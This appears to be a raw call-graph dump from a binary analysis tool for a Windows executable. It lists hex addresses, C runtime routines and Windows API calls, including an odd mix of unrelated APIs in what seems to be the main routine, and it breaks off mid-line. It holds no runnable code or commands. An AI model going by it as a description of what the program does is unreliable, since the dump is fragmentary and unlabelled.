5574->5580 5575 4028dc 5576 4028b2 __except_handler4 5576->5575 5577 4028cc 5576->5577 5578 401000 setSBUpLow 5 API calls 5576->5578 5579 401000 setSBUpLow 5 API calls 5577->5579 5578->5577 5579->5575 5580->5575 5580->5576 5586 404dba RtlUnwind 5580->5586 5582 40292b __except_handler4 5583 40295f 5582->5583 5584 401000 setSBUpLow 5 API calls 5582->5584 5585 401000 setSBUpLow 5 API calls 5583->5585 5584->5583 5585->5576 5586->5582 5650 4033b0 TlsAlloc 4013 401734 4014 401745 4013->4014 4049 40299c HeapCreate 4014->4049 4017 401784 4059 4036d3 GetModuleHandleW 4017->4059 4018 40177d 4051 4016dc 4018->4051 4022 401795 __RTC_Initialize 4092 4044d7 4022->4092 4023 4016dc _fast_error_exit 67 API calls 4023->4022 4025 4017a3 4026 4017af GetCommandLineW 4025->4026 4107 4013d4 4025->4107 4114 40447a GetEnvironmentStringsW 4026->4114 4030 4017be 4120 4043cc GetModuleFileNameW 4030->4120 4032 4017c8 4033 4017d3 4032->4033 4034 4013d4 __amsg_exit 67 API calls 4032->4034 4124 40419d 4033->4124 4034->4033 4037 4017e4 4136 401493 4037->4136 4038 4013d4 __amsg_exit 67 API calls 4038->4037 4040 4017eb 4041 4013d4 __amsg_exit 67 API calls 4040->4041 4042 4017f6 __wwincmdln 4040->4042 4041->4042 4142 416bf0 4042->4142 4044 401817 4045 401825 4044->4045 4145 401644 4044->4145 4148 401670 4045->4148 4048 40182a __locking 4050 401778 4049->4050 4050->4017 4050->4018 4052 4016ea 4051->4052 4053 4016ef 4051->4053 4151 402b77 4052->4151 4160 4029cc 4053->4160 4060 4036e7 4059->4060 4061 4036ed 4059->4061 4064 4013a4 __crt_waiting_on_module_handle 2 API calls 4060->4064 4062 403856 4061->4062 4063 4036f8 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4061->4063 4495 4033ed 4062->4495 4065 403741 TlsAlloc 4063->4065 4064->4061 4068 40178a 4065->4068 4069 40378f TlsSetValue 4065->4069 4068->4022 4068->4023 4069->4068 4070 4037a0 4069->4070 4484 40168e 4070->4484 4073 4032c3 __encode_pointer 6 API calls 4074 4037b0 4073->4074 4075 4032c3 __encode_pointer 6 API calls 4074->4075 4076 4037c0 4075->4076 4077 4032c3 __encode_pointer 6 API calls 4076->4077 4078 4037d0 4077->4078 4079 4032c3 __encode_pointer 6 API calls 4078->4079 4080 4037e0 4079->4080 4491 401b3b 4080->4491 4083 40333e __decode_pointer 6 API calls 4084 403801 4083->4084 4084->4062 4085 40488f __calloc_crt 67 API calls 4084->4085 4086 40381a 4085->4086 4086->4062 4087 40333e __decode_pointer 6 API calls 4086->4087 4088 403834 4087->4088 4088->4062 4089 40383b 4088->4089 4090 40342a __initptd 67 API calls 4089->4090 4091 403843 GetCurrentThreadId 4090->4091 4091->4068 4504 4027b0 4092->4504 4094 4044e3 GetStartupInfoA 4095 40488f __calloc_crt 67 API calls 4094->4095 4102 404504 4095->4102 4096 404722 __locking 4096->4025 4097 40469f GetStdHandle 4101 404669 4097->4101 4098 404704 SetHandleCount 4098->4096 4099 40488f __calloc_crt 67 API calls 4099->4102 4100 4046b1 GetFileType 4100->4101 4101->4096 4101->4097 4101->4098 4101->4100 4103 4040a7 __mtinitlocknum InitializeCriticalSectionAndSpinCount 4101->4103 4102->4096 4102->4099 4102->4101 4104 4045ec 4102->4104 4103->4101 4104->4096 4104->4101 4105 404615 GetFileType 4104->4105 4106 4040a7 __mtinitlocknum InitializeCriticalSectionAndSpinCount 4104->4106 4105->4104 4106->4104 4108 402b77 __FF_MSGBANNER 67 API calls 4107->4108 4109 4013de 4108->4109 4110 4029cc __NMSG_WRITE 67 API calls 4109->4110 4111 4013e6 4110->4111 4112 40333e __decode_pointer 6 API calls 4111->4112 4113 4013f1 4112->4113 4113->4026 4115 40448b 4114->4115 4116 40448f 4114->4116 4115->4030 4117 40484a __malloc_crt 67 API calls 4116->4117 4118 4044b0 _realloc 4117->4118 4119 4044b7 FreeEnvironmentStringsW 4118->4119 4119->4030 4121 404401 _wparse_cmdline 4120->4121 4122 40484a __malloc_crt 67 API calls 4121->4122 4123 404444 _wparse_cmdline 4121->4123 4122->4123 4123->4032 4125 4041b5 _wcslen 4124->4125 4128 4017d9 4124->4128 4126 40488f __calloc_crt 67 API calls 4125->4126 4127 4041d9 _wcslen 4126->4127 4127->4128 4129 40423e 4127->4129 4131 40488f __calloc_crt 67 API calls 4127->4131 4132 404264 4127->4132 4135 40386f __invoke_watson 10 API calls 4127->4135 4505 406161 4127->4505 4128->4037 4128->4038 4130 403235 ___convertcp 67 API calls 4129->4130 4130->4128 4131->4127 4133 403235 ___convertcp 67 API calls 4132->4133 4133->4128 4135->4127 4138 4014a1 __IsNonwritableInCurrentImage 4136->4138 4514 403b47 4138->4514 4139 4014bf __initterm_e 4141 4014de __IsNonwritableInCurrentImage __initterm 4139->4141 4518 403ae4 4139->4518 4141->4040 4647 4167c0 4142->4647 4144 416bf5 4144->4044 5073 401518 4145->5073 4147 401655 4147->4045 4149 401518 _doexit 67 API calls 4148->4149 4150 40167b 4149->4150 4150->4048 4197 405173 4151->4197 4154 405173 __set_error_mode 67 API calls 4156 402b8b 4154->4156 4155 4029cc __NMSG_WRITE 67 API calls 4157 402ba3 4155->4157 4156->4155 4158 402bad 4156->4158 4159 4029cc __NMSG_WRITE 67 API calls 4157->4159 4158->4053 4159->4158 4161 4029e0 4160->4161 4162 405173 __set_error_mode 64 API calls 4161->4162 4193 4016f7 4161->4193 4163 402a02 4162->4163 4164 402b40 GetStdHandle 4163->4164 4166 405173 __set_error_mode 64 API calls 4163->4166 4165 402b4e _strlen 4164->4165 4164->4193 4169 402b67 WriteFile 4165->4169 4165->4193 4167 402a13 4166->4167 4167->4164 4168 402a25 4167->4168 4168->4193 4396 40510b 4168->4396 4169->4193 4172 402a5b GetModuleFileNameA 4173 402a79 4172->4173 4178 402a9c _strlen 4172->4178 4176 40510b _strcpy_s 64 API calls 4173->4176 4177 402a89 4176->4177 4177->4178 4179 40386f __invoke_watson 10 API calls 4177->4179 4188 402adf 4178->4188 4412 404fc8 4178->4412 4179->4178 4183 402b03 4186 404f54 _strcat_s 64 API calls 4183->4186 4185 40386f __invoke_watson 10 API calls 4185->4183 4190 402b17 4186->4190 4187 40386f __invoke_watson 10 API calls 4187->4188 4421 404f54 4188->4421 4189 402b28 4430 404deb 4189->4430 4190->4189 4192 40386f __invoke_watson 10 API calls 4190->4192 4192->4189 4194 401428 4193->4194 4481 4013fd GetModuleHandleW 4194->4481 4198 405182 4197->4198 4199 402b7e 4198->4199 4203 4019d4 4198->4203 4199->4154 4199->4156 4209 403511 GetLastError 4203->4209 4205 4019d9 4206 403997 4205->4206 4207 40333e __decode_pointer 6 API calls 4206->4207 4208 4039a7 __invoke_watson 4207->4208 4223 4033b9 TlsGetValue 4209->4223 4212 40357e SetLastError 4212->4205 4217 403575 4261 403235 4217->4261 4218 40355d 4243 40342a 4218->4243 4221 40357b 4221->4212 4222 403565 GetCurrentThreadId 4222->4212 4224 4033e9 4223->4224 4225 4033ce 4223->4225 4224->4212 4228 40488f 4224->4228 4226 40333e __decode_pointer 6 API calls 4225->4226 4227 4033d9 TlsSetValue 4226->4227 4227->4224 4231 404898 4228->4231 4230 40353c 4230->4212 4233 40333e TlsGetValue 4230->4233 4231->4230 4232 4048b6 Sleep 4231->4232 4274 401a1d 4231->4274 4232->4231 4234 403356 4233->4234 4235 403377 GetModuleHandleW 4233->4235 4234->4235 4238 403360 TlsGetValue 4234->4238 4236 403392 GetProcAddress 4235->4236 4237 403387 4235->4237 4242 40336f 4236->4242 4356 4013a4 4237->4356 4240 40336b 4238->4240 4240->4235 4240->4242 4242->4217 4242->4218 4360 4027b0 4243->4360 4245 403436 GetModuleHandleW 4246 403446 4245->4246 4247 40344c 4245->4247 4248 4013a4 __crt_waiting_on_module_handle 2 API calls 4246->4248 4249 403464 GetProcAddress GetProcAddress 4247->4249 4250 403488 4247->4250 4248->4247 4249->4250 4251 401cb7 __lock 63 API calls 4250->4251 4252 4034a7 InterlockedIncrement 4251->4252 4361 4034ff 4252->4361 4255 401cb7 __lock 63 API calls 4256 4034c8 4255->4256 4364 4059ea InterlockedIncrement 4256->4364 4258 4034e6 4376 403508 4258->4376 4260 4034f3 __locking 4260->4222 4263 403241 __locking 4261->4263 4262 4032ba __locking __dosmaperr 4262->4221 4263->4262 4265 401cb7 __lock 65 API calls 4263->4265 4273 403280 4263->4273 4264 403295 HeapFree 4264->4262 4266 4032a7 4264->4266 4270 403258 ___sbh_find_block 4265->4270 4267 4019d4 __set_error_mode 65 API calls 4266->4267 4268 4032ac GetLastError 4267->4268 4268->4262 4269 403272 4388 40328b 4269->4388 4270->4269 4381 401d1a 4270->4381 4273->4262 4273->4264 4275 401a29 __locking 4274->4275 4276 401a41 4275->4276 4286 401a60 _memset 4275->4286 4277 4019d4 __set_error_mode 66 API calls 4276->4277 4278 401a46 4277->4278 4279 403997 __set_error_mode 6 API calls 4278->4279 4283 401a56 __locking 4279->4283 4280 401ad2 HeapAlloc 4280->4286 4283->4231 4286->4280 4286->4283 4287 401cb7 4286->4287 4294 4024c9 4286->4294 4300 401b19 4286->4300 4303 402bbf 4286->4303 4288 401ccc 4287->4288 4289 401cdf EnterCriticalSection 4287->4289 4306 401bf4 4288->4306 4289->4286 4291 401cd2 4291->4289 4292 4013d4 __amsg_exit 66 API calls 4291->4292 4293 401cde 4292->4293 4293->4289 4297 4024f7 4294->4297 4295 402590 4298 402599 4295->4298 4351 4020e0 4295->4351 4297->4295 4297->4298 4344 402030 4297->4344 4298->4286 4355 401bdd LeaveCriticalSection 4300->4355 4302 401b20 4302->4286 4304 40333e __decode_pointer 6 API calls 4303->4304 4305 402bcf 4304->4305 4305->4286 4307 401c00 __locking 4306->4307 4308 402b77 __FF_MSGBANNER 67 API calls 4307->4308 4321 401c26 4307->4321 4310 401c15 4308->4310 4312 4029cc __NMSG_WRITE 67 API calls 4310->4312 4316 401c1c 4312->4316 4313 401c57 4318 401cb7 __lock 67 API calls 4313->4318 4314 401c48 4317 4019d4 __set_error_mode 67 API calls 4314->4317 4315 401c36 __locking 4315->4291 4319 401428 _fast_error_exit 3 API calls 4316->4319 4317->4315 4320 401c5e 4318->4320 4319->4321 4322 401c92 4320->4322 4323 401c66 4320->4323 4321->4315 4332 40484a 4321->4332 4324 403235 ___convertcp 67 API calls 4322->4324 4337 4040a7 4323->4337 4326 401c83 4324->4326 4341 401cae 4326->4341 4327 401c71 4327->4326 4329 403235 ___convertcp 67 API calls 4327->4329 4330 401c7d 4329->4330 4331 4019d4 __set_error_mode 67 API calls 4330->4331 4331->4326 4336 404853 4332->4336 4333 40109e _malloc 66 API calls 4333->4336 4334 401c41 4334->4313 4334->4314 4335 40486a Sleep 4335->4336 4336->4333 4336->4334 4336->4335 4338 4027b0 __locking 4337->4338 4339 4040b3 InitializeCriticalSectionAndSpinCount 4338->4339 4340 4040f7 __locking 4339->4340 4340->4327 4342 401bdd _doexit LeaveCriticalSection 4341->4342 4343 401cb5 4342->4343 4343->4315 4345 402043 HeapReAlloc 4344->4345 4346 402077 HeapAlloc 4344->4346 4347 402061 4345->4347 4348 402065 4345->4348 4346->4347 4349 40209a VirtualAlloc 4346->4349 4347->4295 4348->4346 4349->4347 4350 4020b4 HeapFree 4349->4350 4350->4347 4352 4020f7 VirtualAlloc 4351->4352 4354 40213e 4352->4354 4354->4298 4355->4302 4357 4013af Sleep GetModuleHandleW 4356->4357 4358 4013d1 4357->4358 4359 4013cd 4357->4359 4358->4236 4358->4242 4359->4357 4359->4358 4360->4245 4379 401bdd LeaveCriticalSection 4361->4379 4363 4034c1 4363->4255 4365 405a08 InterlockedIncrement 4364->4365 4366 405a0b 4364->4366 4365->4366 4367 405a15 InterlockedIncrement 4366->4367 4368 405a18 4366->4368 4367->4368 4369 405a22 InterlockedIncrement 4368->4369 4370 405a25 4368->4370 4369->4370 4371 405a2f InterlockedIncrement 4370->4371 4372 405a32 4370->4372 4371->4372 4373 405a4b InterlockedIncrement 4372->4373 4374 405a5b InterlockedIncrement 4372->4374 4375 405a66 InterlockedIncrement 4372->4375 4373->4372 4374->4372 4375->4258 4380 401bdd LeaveCriticalSection 4376->4380 4378 40350f 4378->4260 4379->4363 4380->4378 4382 401ffb 4381->4382 4383 401d59 4381->4383 4382->4269 4383->4382 4384 401f45 VirtualFree 4383->4384 4385 401fa9 4384->4385 4385->4382 4386 401fb8 VirtualFree HeapFree 4385->4386 4391 404930 4386->4391 4395 401bdd LeaveCriticalSection 4388->4395 4390 403292 4390->4273 4392 404948 4391->4392 4393 40496f __VEC_memcpy 4392->4393 4394 404977 4392->4394 4393->4394 4394->4382 4395->4390 4397 40511c 4396->4397 4400 405123 4396->4400 4397->4400 4403 405149 4397->4403 4398 4019d4 __set_error_mode 67 API calls 4399 405128 4398->4399 4401 403997 __set_error_mode 6 API calls 4399->4401 4400->4398 4402 402a47 4401->4402 4402->4172 4405 40386f 4402->4405 4403->4402 4404 4019d4 __set_error_mode 67 API calls 4403->4404 4404->4399 4457 4047d0 4405->4457 4407 40389c IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 4408 403978 GetCurrentProcess TerminateProcess 4407->4408 4411 40396c __invoke_watson 4407->4411 4459 401000 4408->4459 4410 402a58 4410->4172 4411->4408 4416 404fda 4412->4416 4413 404fde 4414 4019d4 __set_error_mode 67 API calls 4413->4414 4415 402acc 4413->4415 4420 404ffa 4414->4420 4415->4187 4415->4188 4416->4413 4416->4415 4418 405024 4416->4418 4417 403997 __set_error_mode 6 API calls 4417->4415 4418->4415 4419 4019d4 __set_error_mode 67 API calls 4418->4419 4419->4420 4420->4417 4422 404f6c 4421->4422 4424 404f65 4421->4424 4423 4019d4 __set_error_mode 67 API calls 4422->4423 4429 404f71 4423->4429 4424->4422 4427 404fa0 4424->4427 4425 403997 __set_error_mode 6 API calls 4426 402af2 4425->4426 4426->4183 4426->4185 4427->4426 4428 4019d4 __set_error_mode 67 API calls 4427->4428 4428->4429 4429->4425 4468 403335 4430->4468 4433 404e0e LoadLibraryA 4435 404e23 GetProcAddress 4433->4435 4436 404f38 4433->4436 4434 404ec0 4440 40333e __decode_pointer 6 API calls 4434->4440 4454 404eeb 4434->4454 4435->4436 4438 404e39 4435->4438 4436->4193 4437 404e96 4437->4434 4441 40333e __decode_pointer 6 API calls 4437->4441 4471 4032c3 TlsGetValue 4438->4471 4439 40333e __decode_pointer 6 API calls 4439->4436 4450 404f03 4440->4450 4443 404eb3 4441->4443 4446 40333e __decode_pointer 6 API calls 4443->4446 4445 4032c3 __encode_pointer 6 API calls 4447 404e54 GetProcAddress 4445->4447 4446->4434 4448 4032c3 __encode_pointer 6 API calls 4447->4448 4449 404e69 GetProcAddress 4448->4449 4451 4032c3 __encode_pointer 6 API calls 4449->4451 4452 40333e __decode_pointer 6 API calls 4450->4452 4450->4454 4453 404e7e 4451->4453 4452->4454 4453->4437 4455 404e88 GetProcAddress 4453->4455 4454->4439 4456 4032c3 __encode_pointer 6 API calls 4455->4456 4456->4437 4458 4047dc __VEC_memzero 4457->4458 4458->4407 4460 401008 4459->4460 4461 40100a IsDebuggerPresent 4459->4461 4460->4410 4467 4047c1 4461->4467 4464 401959 SetUnhandledExceptionFilter UnhandledExceptionFilter 4465 401976 __invoke_watson 4464->4465 4466 40197e GetCurrentProcess TerminateProcess 4464->4466 4465->4466 4466->4410 4467->4464 4469 4032c3 __encode_pointer 6 API calls 4468->4469 4470 40333c 4469->4470 4470->4433 4470->4437 4472 4032db 4471->4472 4473 4032fc GetModuleHandleW 4471->4473 4472->4473 4474 4032e5 TlsGetValue 4472->4474 4475 403317 GetProcAddress 4473->4475 4476 40330c 4473->4476 4478 4032f0 4474->4478 4480 4032f4 GetProcAddress 4475->4480 4477 4013a4 __crt_waiting_on_module_handle 2 API calls 4476->4477 4479 403312 4477->4479 4478->4473 4478->4480 4479->4475 4479->4480 4480->4445 4482 401411 GetProcAddress 4481->4482 4483 401421 ExitProcess 4481->4483 4482->4483 4485 403335 __init_pointers 6 API calls 4484->4485 4486 401696 __init_pointers __initp_misc_winsig 4485->4486 4501 403cf6 4486->4501 4489 4032c3 __encode_pointer 6 API calls 4490 4016d2 4489->4490 4490->4073 4492 401b46 4491->4492 4493 4040a7 __mtinitlocknum InitializeCriticalSectionAndSpinCount 4492->4493 4494 401b74 4492->4494 4493->4492 4494->4062 4494->4083 4496 4033f7 4495->4496 4497 403403 4495->4497 4498 40333e __decode_pointer 6 API calls 4496->4498 4499 403425 4497->4499 4500 403417 TlsFree 4497->4500 4498->4497 4499->4499 4500->4499 4502 4032c3 __encode_pointer 6 API calls 4501->4502 4503 4016c8 4502->4503 4503->4489 4504->4094 4506 406172 4505->4506 4507 406179 4505->4507 4506->4507 4509 4061a5 4506->4509 4508 4019d4 __set_error_mode 67 API calls 4507->4508 4513 40617e 4508->4513 4511 40618d 4509->4511 4512 4019d4 __set_error_mode 67 API calls 4509->4512 4510 403997 __set_error_mode 6 API calls 4510->4511 4511->4127 4512->4513 4513->4510 4515 403b4d 4514->4515 4516 4032c3 __encode_pointer 6 API calls 4515->4516 4517 403b65 4515->4517 4516->4515 4517->4139 4521 403aa8 4518->4521 4520 403af1 4520->4141 4522 403ab4 __locking 4521->4522 4529 401440 4522->4529 4528 403ad5 __locking 4528->4520 4530 401cb7 __lock 67 API calls 4529->4530 4531 401447 4530->4531 4532 4039bd 4531->4532 4533 40333e __decode_pointer 6 API calls 4532->4533 4534 4039d1 4533->4534 4535 40333e __decode_pointer 6 API calls 4534->4535 4536 4039e1 4535->4536 4537 403a64 4536->4537 4552 405f7e 4536->4552 4549 403ade 4537->4549 4539 403a4b 4540 4032c3 __encode_pointer 6 API calls 4539->4540 4541 403a59 4540->4541 4544 4032c3 __encode_pointer 6 API calls 4541->4544 4542 403a23 4542->4537 4546 4048db __realloc_crt 73 API calls 4542->4546 4547 403a39 4542->4547 4543 4039ff 4543->4539 4543->4542 4565 4048db 4543->4565 4544->4537 4546->4547 4547->4537 4548 4032c3 __encode_pointer 6 API calls 4547->4548 4548->4539 4643 401449 4549->4643 4553 405f8a __locking 4552->4553 4554 405fb7 4553->4554 4555 405f9a 4553->4555 4556 405ff8 HeapSize 4554->4556 4558 401cb7 __lock 67 API calls 4554->4558 4557 4019d4 __set_error_mode 67 API calls 4555->4557 4561 405faf __locking 4556->4561 4559 405f9f 4557->4559 4562 405fc7 ___sbh_find_block 4558->4562 4560 403997 __set_error_mode 6 API calls 4559->4560 4560->4561 4561->4543 4570 406018 4562->4570 4567 4048e4 4565->4567 4568 404923 4567->4568 4569 404904 Sleep 4567->4569 4574 401189 4567->4574 4568->4542 4569->4567 4573 401bdd LeaveCriticalSection 4570->4573 4572 405ff3 4572->4556 4572->4561 4573->4572 4575 401195 __locking 4574->4575 4576 4011aa 4575->4576 4577 40119c 4575->4577 4579 4011b1 4576->4579 4580 4011bd 4576->4580 4610 40109e 4577->4610 4581 403235 ___convertcp 67 API calls 4579->4581 4587 40132f 4580->4587 4608 4011ca ___sbh_resize_block _realloc ___sbh_find_block 4580->4608 4596 4011a4 __locking __dosmaperr 4581->4596 4582 401362 4584 402bbf __calloc_impl 6 API calls 4582->4584 4583 401334 HeapReAlloc 4583->4587 4583->4596 4586 401368 4584->4586 4585 401cb7 __lock 67 API calls 4585->4608 4588 4019d4 __set_error_mode 67 API calls 4586->4588 4587->4582 4587->4583 4589 401386 4587->4589 4590 402bbf __calloc_impl 6 API calls 4587->4590 4593 40137c 4587->4593 4588->4596 4591 4019d4 __set_error_mode 67 API calls 4589->4591 4589->4596 4590->4587 4594 40138f GetLastError 4591->4594 4595 4019d4 __set_error_mode 67 API calls 4593->4595 4594->4596 4598 4012fd 4595->4598 4596->4567 4597 401255 HeapAlloc 4597->4608 4598->4596 4600 401302 GetLastError 4598->4600 4599 4012aa HeapReAlloc 4599->4608 4600->4596 4601 4024c9 ___sbh_alloc_block 5 API calls 4601->4608 4602 401315 4602->4596 4604 4019d4 __set_error_mode 67 API calls 4602->4604 4603 402bbf __calloc_impl 6 API calls 4603->4608 4605 401322 4604->4605 4605->4594 4605->4596 4606 4012f8 4607 4019d4 __set_error_mode 67 API calls 4606->4607 4607->4598 4608->4582 4608->4585 4608->4596 4608->4597 4608->4599 4608->4601 4608->4602 4608->4603 4608->4606 4609 401d1a VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 4608->4609 4627 4012cd 4608->4627 4609->4608 4611 401151 4610->4611 4620 4010b0 4610->4620 4612 402bbf __calloc_impl 6 API calls 4611->4612 4613 401157 4612->4613 4615 4019d4 __set_error_mode 66 API calls 4613->4615 4614 402b77 __FF_MSGBANNER 66 API calls 4614->4620 4626 401149 4615->4626 4617 4029cc __NMSG_WRITE 66 API calls 4617->4620 4618 40110d HeapAlloc 4618->4620 4619 401428 _fast_error_exit 3 API calls 4619->4620 4620->4614 4620->4617 4620->4618 4620->4619 4621 40113d 4620->4621 4623 402bbf __calloc_impl 6 API calls 4620->4623 4624 401142 4620->4624 4620->4626 4630 40104f 4620->4630 4622 4019d4 __set_error_mode 66 API calls 4621->4622 4622->4624 4623->4620 4625 4019d4 __set_error_mode 66 API calls 4624->4625 4625->4626 4626->4596 4642 401bdd LeaveCriticalSection 4627->4642 4629 4012d4 4629->4608 4631 40105b __locking 4630->4631 4632 401cb7 __lock 67 API calls 4631->4632 4633 40108c __locking 4631->4633 4634 401071 4632->4634 4633->4620 4635 4024c9 ___sbh_alloc_block 5 API calls 4634->4635 4636 40107c 4635->4636 4638 401095 4636->4638 4641 401bdd LeaveCriticalSection 4638->4641 4640 40109c 4640->4633 4641->4640 4642->4629 4646 401bdd LeaveCriticalSection 4643->4646 4645 401450 4645->4528 4646->4645 4648 4167cd __write_nolock 4647->4648 4649 4167f9 GetVolumeInformationA 4648->4649 4650 41684a WriteConsoleOutputAttribute 4648->4650 4651 416890 4648->4651 4649->4648 4650->4648 4652 4168b5 DeleteVolumeMountPointW 4651->4652 4653 4168c2 4651->4653 4652->4651 4654 4169d6 4653->4654 4655 4168cf InterlockedCompareExchange GetFocus ReadConsoleW FindAtomW SetConsoleMode 4653->4655 4657 4169f0 SetCommState GetLastError 4654->4657 4659 416a09 4654->4659 4656 4047d0 _memset 4655->4656 4658 416917 7 API calls 4656->4658 4657->4654 4657->4659 4660 4169c0 4658->4660 4661 4169b4 ObjectPrivilegeAuditAlarmA 4658->4661 4662 416ac2 4659->4662 4663 416a16 8 API calls 4659->4663 4664 4169d0 4660->4664 4665 4169c9 ReleaseMutex 4660->4665 4661->4660 4709 4164a0 LocalAlloc 4662->4709 4699 40100f 4663->4699 4696 401168 4664->4696 4665->4664 4671 401189 _realloc 72 API calls 4673 416a9a 4671->4673 4675 40109e _malloc 67 API calls 4673->4675 4678 416aa0 4675->4678 4676 416ac7 LoadLibraryW 4710 4164d0 GetModuleHandleW GetProcAddress 4676->4710 4679 40100f _calloc 67 API calls 4678->4679 4680 416aa7 4679->4680 4706 4072fe 4680->4706 4681 416b39 LocalAlloc GetStdHandle MoveFileA 4683 416b22 4681->4683 4683->4681 4686 416b63 InterlockedDecrement 4683->4686 4688 416b79 4683->4688 4685 40100f _calloc 67 API calls 4687 416ab3 4685->4687 4686->4683 4689 40109e _malloc 67 API calls 4687->4689 4691 416ba2 GetFileAttributesW 4688->4691 4693 416bae 4688->4693 4690 416ab9 4689->4690 4692 401644 67 API calls 4690->4692 4691->4688 4692->4662 4694 401000 setSBUpLow 5 API calls 4693->4694 4695 416be1 4694->4695 4695->4144 4725 402e9d 4696->4725 4700 401a1d __calloc_impl 67 API calls 4699->4700 4701 401029 4700->4701 4702 4019d4 __set_error_mode 67 API calls 4701->4702 4705 401045 4701->4705 4703 40103c 4702->4703 4704 4019d4 __set_error_mode 67 API calls 4703->4704 4703->4705 4704->4705 4705->4671 5031 407224 4706->5031 4708 407305 4708->4685 4709->4676 4711 41660d 4710->4711 4712 416720 4711->4712 4713 416749 QueryDosDeviceA 4712->4713 4714 41675a 4712->4714 4713->4714 5059 416670 4714->5059 4717 416775 5062 4166b0 4717->5062 4718 41676d FreeEnvironmentStringsW 4718->4717 4721 4167a3 4723 401000 setSBUpLow 5 API calls 4721->4723 4722 41678c HeapDestroy GetNumaProcessorNode 4722->4721 4724 4167ad 4723->4724 4724->4683 4726 402eb6 4725->4726 4729 402c6e 4726->4729 4741 402be7 4729->4741 4731 402c95 4732 4019d4 __set_error_mode 67 API calls 4731->4732 4734 402c9a 4732->4734 4735 403997 __set_error_mode 6 API calls 4734->4735 4738 401179 4735->4738 4737 402cd2 4739 402d17 4737->4739 4749 405bc6 4737->4749 4738->4654 4739->4738 4740 4019d4 __set_error_mode 67 API calls 4739->4740 4740->4738 4742 402bfa 4741->4742 4746 402c47 4741->4746 4756 40358a 4742->4756 4745 402c27 4745->4746 4776 4053e4 4745->4776 4746->4731 4746->4737 4750 402be7 _LocaleUpdate::_LocaleUpdate 77 API calls 4749->4750 4751 405bda 4750->4751 4755 405be7 4751->4755 4964 406d80 4751->4964 4755->4737 4757 403511 __getptd_noexit 67 API calls 4756->4757 4758 403592 4757->4758 4759 4013d4 __amsg_exit 67 API calls 4758->4759 4760 402bff 4758->4760 4759->4760 4760->4745 4761 405b50 4760->4761 4762 405b5c __locking 4761->4762 4763 40358a __getptd 67 API calls 4762->4763 4764 405b61 4763->4764 4765 405b8f 4764->4765 4767 405b73 4764->4767 4766 401cb7 __lock 67 API calls 4765->4766 4768 405b96 4766->4768 4769 40358a __getptd 67 API calls 4767->4769 4792 405b12 4768->4792 4771 405b78 4769->4771 4774 405b86 __locking 4771->4774 4775 4013d4 __amsg_exit 67 API calls 4771->4775 4774->4745 4775->4774 4777 4053f0 __locking 4776->4777 4778 40358a __getptd 67 API calls 4777->4778 4779 4053f5 4778->4779 4780 401cb7 __lock 67 API calls 4779->4780 4781 405407 4779->4781 4782 405425 4780->4782 4783 405415 __locking 4781->4783 4785 4013d4 __amsg_exit 67 API calls 4781->4785 4784 40546e 4782->4784 4787 405456 InterlockedIncrement 4782->4787 4788 40543c InterlockedDecrement 4782->4788 4783->4746 4960 40547f 4784->4960 4785->4783 4787->4784 4788->4787 4789 405447 4788->4789 4789->4787 4790 403235 ___convertcp 67 API calls 4789->4790 4791 405455 4790->4791 4791->4787 4793 405b16 4792->4793 4799 405b48 4792->4799 4794 4059ea ___addlocaleref 8 API calls 4793->4794 4793->4799 4795 405b29 4794->4795 4795->4799 4803 405a79 4795->4803 4800 405bba 4799->4800 4959 401bdd LeaveCriticalSection 4800->4959 4802 405bc1 4802->4771 4804 405a8a InterlockedDecrement 4803->4804 4805 405b0d 4803->4805 4806 405aa2 4804->4806 4807 405a9f InterlockedDecrement 4804->4807 4805->4799 4817 4058a1 4805->4817 4808 405aac InterlockedDecrement 4806->4808 4809 405aaf 4806->4809 4807->4806 4808->4809 4810 405ab9 InterlockedDecrement 4809->4810 4811 405abc 4809->4811 4810->4811 4812 405ac6 InterlockedDecrement 4811->4812 4814 405ac9 4811->4814 4812->4814 4813 405ae2 InterlockedDecrement 4813->4814 4814->4813 4815 405af2 InterlockedDecrement 4814->4815 4816 405afd InterlockedDecrement 4814->4816 4815->4814 4816->4805 4818 405925 4817->4818 4820 4058b8 4817->4820 4819 405972 4818->4819 4821 403235 ___convertcp 67 API calls 4818->4821 4832 405999 4819->4832 4871 4069ed 4819->4871 4820->4818 4822 4058ec 4820->4822 4830 403235 ___convertcp 67 API calls 4820->4830 4824 405946 4821->4824 4826 40590d 4822->4826 4837 403235 ___convertcp 67 API calls 4822->4837 4827 403235 ___convertcp 67 API calls 4824->4827 4828 403235 ___convertcp 67 API calls 4826->4828 4833 405959 4827->4833 4834 40591a 4828->4834 4829 4059de 4835 403235 ___convertcp 67 API calls 4829->4835 4836 4058e1 4830->4836 4831 403235 ___convertcp 67 API calls 4831->4832 4832->4829 4841 403235 67 API calls ___convertcp 4832->4841 4838 403235 ___convertcp 67 API calls 4833->4838 4842 403235 ___convertcp 67 API calls 4834->4842 4843 4059e4 4835->4843 4847 406bc7 4836->4847 4839 405902 4837->4839 4840 405967 4838->4840 4863 406b82 4839->4863 4846 403235 ___convertcp 67 API calls 4840->4846 4841->4832 4842->4818 4843->4799 4846->4819 4848 406bd4 4847->4848 4862 406c51 4847->4862 4849 406be5 4848->4849 4850 403235 ___convertcp 67 API calls 4848->4850 4851 406bf7 4849->4851 4852 403235 ___convertcp 67 API calls 4849->4852 4850->4849 4853 403235 ___convertcp 67 API calls 4851->4853 4857 406c09 4851->4857 4852->4851 4853->4857 4854 403235 ___convertcp 67 API calls 4855 406c1b 4854->4855 4856 406c2d 4855->4856 4858 403235 ___convertcp 67 API calls 4855->4858 4859 406c3f 4856->4859 4860 403235 ___convertcp 67 API calls 4856->4860 4857->4854 4857->4855 4858->4856 4861 403235 ___convertcp 67 API calls 4859->4861 4859->4862 4860->4859 4861->4862 4862->4822 4864 406bc3 4863->4864 4865 406b8f 4863->4865 4864->4826 4866 406b9f 4865->4866 4867 403235 ___convertcp 67 API calls 4865->4867 4868 406bb1 4866->4868 4869 403235 ___convertcp 67 API calls 4866->4869 4867->4866 4868->4864 4870 403235 ___convertcp 67 API calls 4868->4870 4869->4868 4870->4864 4872 4069fe 4871->4872 4873 405992 4871->4873 4874 403235 ___convertcp 67 API calls 4872->4874 4873->4831 4875 406a06 4874->4875 4876 403235 ___convertcp 67 API calls 4875->4876 4877 406a0e 4876->4877 4878 403235 ___convertcp 67 API calls 4877->4878 4879 406a16 4878->4879 4880 403235 ___convertcp 67 API calls 4879->4880 4881 406a1e 4880->4881 4882 403235 